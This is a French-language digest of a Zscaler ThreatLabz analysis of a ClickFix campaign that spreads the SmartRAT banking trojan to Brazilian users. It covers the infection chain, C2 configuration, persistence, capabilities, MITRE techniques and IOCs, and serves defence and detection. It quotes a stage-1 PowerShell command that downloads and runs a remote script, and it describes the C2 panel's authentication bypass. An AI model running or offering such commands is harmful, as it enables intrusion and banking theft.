🔍 Contexte

Publié le 17 juin 2026 par Zscaler ThreatLabz (chercheurs Shruti Dixit et Manisha Ramcharan Prajapati), cet article documente une campagne ClickFix observée en mars 2026 utilisant des sites web générés par IA pour distribuer un nouveau RAT bancaire nommé SmartRAT. Trend Micro a également analysé ce malware sous le nom Banana RAT avec un vecteur d’attaque différent.

🎯 Vecteur d’infection

Les acteurs malveillants ont enregistré le domaine typosquatté cartaobb[.]com imitant le domaine légitime cartaobrb[.]com[.]br d’une banque brésilienne populaire. La page frauduleuse, vraisemblablement générée par un outil de création de sites web IA, présente :

  • Un faux CAPTCHA Cloudflare
  • Un faux écran bleu de la mort (BSOD) en plein écran
  • Des mesures anti-inspection (blocage des raccourcis DevTools, effacement de la console toutes les 3 secondes)
  • Un mécanisme de verrouillage forçant le mode plein écran et restreignant les entrées clavier

Après interaction avec le faux CAPTCHA, une commande PowerShell malveillante est copiée dans le presse-papiers pour être exécutée via Win+R.

📦 Chaîne de livraison du payload

  1. Stage 1 : powershell "$k8='http://64.95.13.238/st.txt';iex(irm $k8)" — télécharge et exécute st.txt
  2. Stage 2 (st.txt) : dropper PowerShell furtif qui masque la fenêtre console, télécharge payload.php et l’exécute comme ScriptBlock
  3. Stage 3 (payload.php) : décode des chaînes Base64 hardcodées, déchiffre un blob AES-CBC et exécute le RAT SmartRAT

🦠 Analyse de SmartRAT

SmartRAT est un RAT bancaire entièrement implémenté en PowerShell, identifié par la chaîne SMART_V25, ciblant principalement les utilisateurs brésiliens.

Configuration C2 :

  • C2 principal : c.windowsupdate-cdn.com (déchiffré par XOR clé 2)
  • C2 de secours : 162.141.111.227 (déchiffré par XOR clé 233)
  • Port : 51888 (TCP brut)
  • Chiffrement : AES-CBC avec clé dérivée du SHA-256 de la clé maître hardcodée iuhbdaubdvauygd5562$3@##$r

Persistance :

  • Tâche planifiée nommée MicrosoftEdgeUpdateCore
  • Clé de registre HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Service Windows MicrosoftEdgeUpdateCore (si élévation UAC accordée) avec watchdog toutes les 5 secondes
  • Copie dans %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt

Capacités opérateur :

  • Contrôle à distance (souris, clavier, écran)
  • Keylogger haute priorité
  • Overlays plein écran imitant les banques brésiliennes (Itaú, Bradesco, Santander, Banco do Brasil, Caixa)
  • Interception et substitution de QR codes bancaires
  • Streaming d’écran (intervalle par défaut : 12 ms)
  • Navigation et exfiltration de fichiers (jusqu’à 50 Mo)
  • Exécution de commandes PowerShell arbitraires
  • Liste de processus et services Windows

Surveillance bancaire : SmartRAT surveille les titres de fenêtres correspondant à des mots-clés de banques brésiliennes (Santander, Bradesco, Itaú, Caixa, Nubank, etc.), plateformes de paiement (Mercado Pago, PicPay, PayPal) et exchanges crypto (Binance, Mercado Bitcoin).

⚠️ Faiblesse du panneau C2

Le panneau C2 web nommé MyGood PRO présente une faille d’authentification critique : la vérification de l’authentification est entièrement côté client via deux valeurs localStorage (authToken et currentUser), sans validation serveur. N’importe quel utilisateur peut contourner l’écran de connexion en définissant des valeurs arbitraires dans le localStorage du navigateur.

📋 IOCs principaux

  • Domaines frauduleux : cartaobb.com, crefisa.online, vfsgloball.net
  • C2 : windowsupdate-cdn.com, 64.95.13.238, 162.141.111.227
  • MD5 : 297eb45f028d44d750297d2f932b9c91 (st.txt), 6bf4d4c62b5138ace281ce3d08297787 (payload.php), 3c72e1f37f115b00c3ad6ed31bacfe8a et b17ccdb5531555e43f082d6e77c07227 (RAT PowerShell)

📌 Nature de l’article

Il s’agit d’une analyse technique approfondie publiée par Zscaler ThreatLabz, visant à documenter une nouvelle campagne malveillante, décrire le fonctionnement détaillé de SmartRAT et fournir des IOCs exploitables pour la détection.

🧠 TTPs et IOCs détectés

TTP

  • T1566 — Phishing (Initial Access)
  • T1059 — Command and Scripting Interpreter (Execution)
  • T1059.001 — PowerShell (Execution)
  • T1569.002 — Service Execution (Execution)
  • T1543.003 — Create or Modify System Process: Windows Service (Persistence)
  • T1036 — Masquerading (Defense Evasion)
  • T1070.004 — Indicator Removal: File Deletion (Defense Evasion)
  • T1082 — System Information Discovery (Discovery)
  • T1071 — Application Layer Protocol (Command and Control)
  • T1056.001 — Keylogging (Collection)
  • T1113 — Screen Capture (Collection)
  • T1115 — Clipboard Data (Collection)
  • T1547.001 — Registry Run Keys / Startup Folder (Persistence)
  • T1053.005 — Scheduled Task (Persistence)
  • T1140 — Deobfuscate/Decode Files or Information (Defense Evasion)
  • T1573.001 — Encrypted Channel: Symmetric Cryptography (Command and Control)

IOC

  • IPv4 : 64.95.13.238AbuseIPDB · VT · ThreatFox
  • IPv4 : 162.141.111.227AbuseIPDB · VT · ThreatFox
  • Domaines : cartaobb.comVT · URLhaus · ThreatFox
  • Domaines : crefisa.onlineVT · URLhaus · ThreatFox
  • Domaines : vfsgloball.netVT · URLhaus · ThreatFox
  • Domaines : windowsupdate-cdn.comVT · URLhaus · ThreatFox
  • URLs : http://64.95.13.238/st.txtURLhaus
  • URLs : http://64.95.13.238/payload.phpURLhaus
  • MD5 : 297eb45f028d44d750297d2f932b9c91VT · MalwareBazaar
  • MD5 : 6bf4d4c62b5138ace281ce3d08297787VT · MalwareBazaar
  • MD5 : 3c72e1f37f115b00c3ad6ed31bacfe8aVT · MalwareBazaar
  • MD5 : b17ccdb5531555e43f082d6e77c07227VT · MalwareBazaar
  • Fichiers : st.txt
  • Fichiers : payload.php
  • Fichiers : msedge.txt
  • Fichiers : msedgeupdate.txt
  • Fichiers : etw.dat
  • Fichiers : install.token
  • Chemins : C:\Users\Public\Documents\msedge.txt
  • Chemins : %APPDATA%\Microsoft\Diagnosis\ETW\msedgeupdate.txt
  • Chemins : C:\ProgramData\Microsoft\Diagnosis\ETW\client_debug.log
  • Chemins : %APPDATA%\Microsoft\Diagnosis\ETW\client_debug.log
  • Chemins : %TEMP%\client_debug.log

Malware / Outils

  • SmartRAT (rat)
  • Banana RAT (rat)

🟢 Indice de vérification factuelle : 83/100 (haute)

  • ✅ zscaler.com — source reconnue (liste interne) (20pts)
  • ✅ 25588 chars — texte complet (fulltext extrait) (15pts)
  • ✅ 23 IOCs dont des hashes (15pts)
  • ✅ 1/7 IOC(s) confirmé(s) (AbuseIPDB, ThreatFox, URLhaus, VirusTotal) (8pts)
  • ✅ 16 TTPs MITRE identifiées (15pts)
  • ✅ date extraite du HTML source (10pts)
  • ⬜ aucun acteur de menace nommé (0pts)
  • ⬜ pas de CVE à vérifier (0pts)

IOCs confirmés externellement :

  • 162.141.111.227 (ip) → VT (15/91 détections)

🔗 Source originale : https://www.zscaler.com/blogs/security-research/clickfix-campaign-generated-ai-delivers-smartrat